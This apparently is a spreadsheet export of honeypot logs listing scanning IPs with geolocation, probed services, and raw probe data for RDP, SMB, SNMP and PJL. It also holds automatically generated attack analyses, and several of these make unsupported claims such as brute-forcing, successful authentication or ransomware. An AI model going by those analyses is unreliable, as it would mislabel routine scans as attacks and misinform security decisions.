    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SOCKS5_H24&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_POSTGRES_H39&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_IMAP_H6&amp;&amp;SMA-LAB_POP3_H30&amp;&amp;SMA-LAB_IMAP_H10&amp;&amp;SMA-LAB_SIP_H34&amp;&amp;SMA-LAB_LDAP_H6&amp;&amp;SMA-LAB_ORACLE_H8&amp;&amp;SMA-LAB_POSTGRES_H38&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_MSSQL_H38&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_SNMP_H7&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_SNMP_H30&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_RDP_H41&amp;&amp;SMA-LAB_SNMP_H4&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_SIP_H15&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_POSTGRES_H9&amp;&amp;SMA-LAB_SNMP_H14&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_IMAP_H38&amp;&amp;SMA-LAB_MYSQL_H41&amp;&amp;SMA-LAB_ORACLE_H9&amp;&amp;SMA-LAB_MYSQL_H12&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_MYSQL_H9&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_ORACLE_H2&amp;&amp;SMA-LAB_IMAP_H19&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_FTP_H22&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_IMAP_H11&amp;&amp;SMA-LAB_IRC_H47&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_SNMP_H13&amp;&amp;SMA-LAB_SNMP_H23&amp;&amp;SMA-LAB_FTP_H29&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_SNMP_H21&amp;&amp;SMA-LAB_IMAP_H37&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_IMAP_H35&amp;&amp;SMA-LAB_PJL_H21&amp;&amp;SMA-LAB_POP3_H22&amp;&amp;SMA-LAB_POSTGRES_H27&amp;&amp;SMA-LAB_SIP_H6&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_SMB_H5&amp;&amp;SMA-LAB_ORACLE_H39&amp;&amp;SMA-LAB_ORACLE_H37&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_FTP_H10&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_RDP_H29&amp;&amp;SMA-LAB_PJL_H29&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_SIP_H2&amp;&amp;SMA-LAB_SNMP_H28&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_IMAP_H25&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_FTP_H15&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_SMB_H31</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1080&amp;&amp;5432&amp;&amp;3389&amp;&amp;143&amp;&amp;110&amp;&amp;NA&amp;&amp;1521&amp;&amp;1433&amp;&amp;445&amp;&amp;161&amp;&amp;50456&amp;&amp;5900&amp;&amp;13205&amp;&amp;23&amp;&amp;58614&amp;&amp;58610&amp;&amp;3306&amp;&amp;6667&amp;&amp;8443&amp;&amp;9100&amp;&amp;6379&amp;&amp;52375&amp;&amp;389&amp;&amp;53941&amp;&amp;80&amp;&amp;443&amp;&amp;50574&amp;&amp;21&amp;&amp;58547&amp;&amp;51053&amp;&amp;57221&amp;&amp;49726&amp;&amp;55523&amp;&amp;50564&amp;&amp;53716&amp;&amp;50010</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'singular.ttk.pte.hu': ['unknown']}</t>
  </si>
  <si>
    <t>connection&amp;&amp;request&amp;&amp;command&amp;&amp;stshash&amp;&amp;NA&amp;&amp;query&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:Incoming connection (205.210.31.38,57664)}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EiigDwoqT'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hdtmkW'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=PYCWWe'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.38,64526)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.38,64534)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.38,64550)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ebiTivlyb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ZuhqCa'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UTBtyz'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eomKVpJyb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GRiUUk'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=Jjeauc'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=szhhaCLVG'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=pWwsPp'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=TEvjmx'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.38,60316)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.38,60322)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.38,60324)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GptwUHMkA'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=nloWTJ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=plHNlt'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yBKMYbFrw'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CHzxhu'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CCjnUQ'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=zJSFVIGeT'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=wkdFrO'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UdTmmz'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.38,64050)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GuotzRQMB'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=dsjrXyGFE'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=AeolYg'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=YOPwtG'}}</t>
  </si>
  <si>
    <t>::ffff:cdd2:1f26</t>
  </si>
  <si>
    <t>No data is provided to analyze. &amp;&amp; No malicious FTP activity detected, as "NA" indicates no connection attempt or login occurred. This suggests that an attacker did not attempt to exploit the FTP service. No suspicious FTP-related actions were logged. &amp;&amp; The log indicates an incoming SIP (Session Initiation Protocol) connection attempt from an unknown source.
No data is available for this session, suggesting the attacker may be probing or scanning for vulnerabilities.
This could be a reconnaissance activity by a potential attacker. &amp;&amp; No log data provided, therefore cannot analyze or describe any possible malicious activity. &amp;&amp; This data suggests an attempt to exploit a vulnerability in the Remote Desktop Protocol, with the potential goal of gaining unauthorized access or executing malicious code on the target system. The presence of a "mstshash" cookie indicates a possible brute-force attack against authentication mechanisms. This may be indicative of a malicious actor trying to gain control over the system. &amp;&amp; The log indicates a potential attempt to use an anonymous proxy service, but no connection was established as indicated by "NA" for SOCKS5 data. This could be an indication of reconnaissance or an attempt to hide malicious activity through IP address obfuscation. The lack of actual data suggests the attempt may have been unsuccessful. &amp;&amp; Possible print job submission to gain unauthorized access to printer settings or services, potentially leading to further malicious activity such as data exfiltration or system compromise. This is an attempt to exploit a vulnerability in the printing service for malicious purposes. The goal is likely to gain control over printer operations and functionality. &amp;&amp; This log indicates a potential attempt to exploit the printer spooler service, likely as part of a larger attack vector. Malicious actors are probing for vulnerabilities and testing system weaknesses. The activity suggests an attacker attempting to gather information about the target system's configuration. &amp;&amp; The data suggests a possible attempt to steal session hashes, specifically the Microsoft Terminal Services hash (mstshash), which could be used for unauthorized access. This is likely an attempt at stealing credentials from an RDP connection. A potential password cracking or brute force attack may follow this activity. &amp;&amp; This log data suggests that an attacker is attempting to brute-force access to a remote desktop session, likely using a dictionary attack with the password hash being revealed. The presence of the cookie parameter indicates that the attacker has successfully authenticated at some point. This activity could be indicative of a password cracking attempt. &amp;&amp; Possible malicious activity involves attempting to bypass Windows authentication by spoofing the Secure Hash Algorithm (SHA) hash value, potentially leading to unauthorized access. This is often used in brute-force attacks or password cracking. It may be an attempt to gain remote access to a system. &amp;&amp; The log data suggests an attempt to inject malware through Remote Desktop Protocol (RDP) to gain unauthorized access and control of the system, potentially leading to data theft or further malicious activities. The presence of a cookie with an mstshash value indicates an attempt to bypass security measures, specifically targeting Microsoft Terminal Server licensing. &amp;&amp; An attacker is trying to authenticate using a stolen or guessed RDP password hash, likely attempting to gain unauthorized access to the system.
The presence of an invalid or fake password hash suggests malicious activity and potential brute-force attacks.
This could be an attempt to exploit weak passwords on the network. &amp;&amp; This log entry suggests an attempt to brute-force login to a Remote Desktop service, likely using a malicious tool to guess or crack passwords. The presence of a hash value indicates the attacker is trying to authenticate with a valid user account and password combination. This activity may be part of a larger cyber attack aimed at gaining unauthorized access to the system. &amp;&amp; Unauthorized access to a device with a default community string 'public' is possible, potentially allowing attackers to collect system information and configuration details. 
This could be a sign of an insider attack or an attempt to gather intelligence on the target system's SNMP settings. &amp;&amp; Unknown client sending capability request, possibly probing for vulnerabilities or attempting to exploit a weakness in the server's capabilities handling. This could be an initial step in a more malicious attack. The intent is likely reconnaissance or exploitation.</t>
  </si>
  <si>
    <t>SIP Attack &amp;&amp; Port Scan &amp;&amp; Print Job Attack &amp;&amp; Printer Spoofing &amp;&amp; RDP Ransom &amp;&amp; RDP Exploit &amp;&amp; RDP Poisoning &amp;&amp; Rdp Brute &amp;&amp; RDP Brute &amp;&amp; RDP Ransomware &amp;&amp; SNMP Brute &amp;&amp; Nmap Scan</t>
  </si>
  <si>
    <t>4fe28e6a0fa59c6afe100a1ab9a17a27</t>
  </si>
  <si>
    <t>210.18.181.184</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;27379&amp;&amp;45446&amp;&amp;NA</t>
  </si>
  <si>
    <t>TN</t>
  </si>
  <si>
    <t>Tamil Nadu</t>
  </si>
  <si>
    <t>Chengalpattu</t>
  </si>
  <si>
    <t>Madipakkam</t>
  </si>
  <si>
    <t>1465825</t>
  </si>
  <si>
    <t>12.9623</t>
  </si>
  <si>
    <t>80.1986</t>
  </si>
  <si>
    <t>17488</t>
  </si>
  <si>
    <t>HATHWAY CABLE AND DATACOM LIMITED</t>
  </si>
  <si>
    <t>Hathway IP over Cable Internet Access</t>
  </si>
  <si>
    <t>Hathway Cable and Datacom Pvt Ltd</t>
  </si>
  <si>
    <t>::ffff:d212:b5b8</t>
  </si>
  <si>
    <t>398510a075131d27460ddc995d2613f2</t>
  </si>
  <si>
    <t>122.54.143.156</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H31&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_H10</t>
  </si>
  <si>
    <t>PH</t>
  </si>
  <si>
    <t>Philippines</t>
  </si>
  <si>
    <t>00</t>
  </si>
  <si>
    <t>National Capital Region</t>
  </si>
  <si>
    <t>Eastern Manila District</t>
  </si>
  <si>
    <t>Mandaluyong</t>
  </si>
  <si>
    <t>13118244</t>
  </si>
  <si>
    <t>1550</t>
  </si>
  <si>
    <t>14.5764</t>
  </si>
  <si>
    <t>121.039</t>
  </si>
  <si>
    <t>9299</t>
  </si>
  <si>
    <t>Philippine Long Distance Telephone Co.</t>
  </si>
  <si>
    <t>Philippine Long Distance Telephone Company</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,62513)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,62633)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,52583)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,55001)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,50593)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,50666)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,57025)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,57488)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,49890)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,49970)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,53741)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,53785)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,61504)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,61622)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,51902)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,51980)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,63038)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,63163)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,50856)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,50983)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,52869)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,54346)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,54433)}&amp;&amp;{Data_SMB:Incoming connection (122.54.143.156,54783)}</t>
  </si>
  <si>
    <t>::ffff:7a36:8f9c</t>
  </si>
  <si>
    <t>A remote computer is attempting to connect to a shared resource on this system from an unknown IP address. This could be part of a larger malicious operation to gain unauthorized access or spread malware. The request likely originates from a compromised host or a botnet. &amp;&amp; An incoming connection from an unknown IP address suggests a potential attack attempt to access shared resources on the network.
The attacker may be attempting to exploit vulnerabilities or gain unauthorized access to sensitive files and directories.
This could be indicative of a malicious SMB scan or brute-force login attempt. &amp;&amp; An incoming connection was attempted from an external IP address to a SMB service. This could be an attempt to exploit the service for malicious purposes such as file sharing or spreading malware. The source IP may indicate the origin of the attack. &amp;&amp; A possible malicious activity is an incoming connection attempt from an unknown IP address to a SMB service. This could be a brute-force attack or unauthorized access attempt. The IP 122.54.143.156 may be attempting to exploit vulnerabilities in the SMB service for malicious purposes. &amp;&amp; This data suggests an unknown activity occurred, as there is no information provided about any malicious behavior or otherwise.
It indicates a lack of data, making it impossible to analyze or draw conclusions from the given information. &amp;&amp; A remote system is attempting to establish a connection to a service on this network from an external IP address 122.54.143.156, using a non-standard port. This could be an attempt to exploit the service for malicious purposes or gain unauthorized access. The use of a non-standard port suggests potential reconnaissance or scanning activity.</t>
  </si>
  <si>
    <t>Port Scanner &amp;&amp; Port Scanner &amp;&amp; SMB Attack</t>
  </si>
  <si>
    <t>3afc6f53755c02c0b2519942eb018ade</t>
  </si>
  <si>
    <t>59.127.199.170</t>
  </si>
  <si>
    <t>59-127-199-170.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;55454&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:3b7f:c7aa</t>
  </si>
  <si>
    <t>5b2d4aa8081a93ea65405bf980fa052e</t>
  </si>
  <si>
    <t>68.45.120.65</t>
  </si>
  <si>
    <t>c-68-45-120-65.hsd1.in.comcast.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>Indiana</t>
  </si>
  <si>
    <t>Blackford</t>
  </si>
  <si>
    <t>Hartford City</t>
  </si>
  <si>
    <t>4921229</t>
  </si>
  <si>
    <t>47348</t>
  </si>
  <si>
    <t>40.4512</t>
  </si>
  <si>
    <t>-85.37</t>
  </si>
  <si>
    <t>7922</t>
  </si>
  <si>
    <t>Comcast Cable Communications, LLC</t>
  </si>
  <si>
    <t>Comcast Cable Communications, Inc.</t>
  </si>
  <si>
    <t>::ffff:442d:7841</t>
  </si>
  <si>
    <t>7ff4fc420178894af13dd1b9a1ae2fe2</t>
  </si>
  <si>
    <t>117.247.52.87</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H27</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,56961)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,57079)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,55422)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,55591)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,53668)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,54235)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,54408)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,50888)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,50933)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,49628)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,49673)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,55684)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,55890)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,55985)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,62894)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,62996)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,52341)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,52492)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,49642)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,50008)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (117.247.52.87,58339)}</t>
  </si>
  <si>
    <t>::ffff:75f7:3457</t>
  </si>
  <si>
    <t>There is insufficient data provided for analysis. &amp;&amp; This log entry suggests that there was an attempt to access Microsoft SQL Server without specifying credentials, indicating a potential brute force attack or malicious query scanning. 
The attacker may be trying to identify vulnerabilities in the database's security settings.
This could be a precursor to further malicious activity such as data theft or exploitation of SQL injection vulnerabilities.</t>
  </si>
  <si>
    <t>I don't see any log data provided. Please provide the actual log data for me to analyze. I'll be happy to help you identify the type of attack and categorize it with a short phrase (max 2 words).</t>
  </si>
  <si>
    <t>b321a83b0ee1edf4a700ede6af1f2e2c</t>
  </si>
  <si>
    <t>185.42.226.222</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_MSSQL_H36</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;143&amp;&amp;62848&amp;&amp;NA&amp;&amp;3306</t>
  </si>
  <si>
    <t>35.7018</t>
  </si>
  <si>
    <t>51.4368</t>
  </si>
  <si>
    <t>49847</t>
  </si>
  <si>
    <t>Pardazeshgar Ray Azma Co. Ltd.</t>
  </si>
  <si>
    <t>Pardazeshgar Rayazma Ltd.</t>
  </si>
  <si>
    <t>RAYNET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:Incoming connection (185.42.226.222,54373)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (185.42.226.222,63865)}&amp;&amp;{Data_SMB:Incoming connection (185.42.226.222,64351)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (185.42.226.222,60906)}&amp;&amp;{Data_SMB:Incoming connection (185.42.226.222,61348)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}</t>
  </si>
  <si>
    <t>::ffff:b92a:e2de</t>
  </si>
  <si>
    <t>Malicious connection attempt to a MySQL database was detected but no further information is available as it seems to be incomplete or unknown. This indicates potential exploitation of a vulnerability or unauthorized access attempt. Further analysis is needed to determine the full extent of the malicious activity.</t>
  </si>
  <si>
    <t>4eb5b9da9ad014bb372c6c55b6a5a2f3</t>
  </si>
  <si>
    <t>61.0.86.144</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15</t>
  </si>
  <si>
    <t>2000-01-11</t>
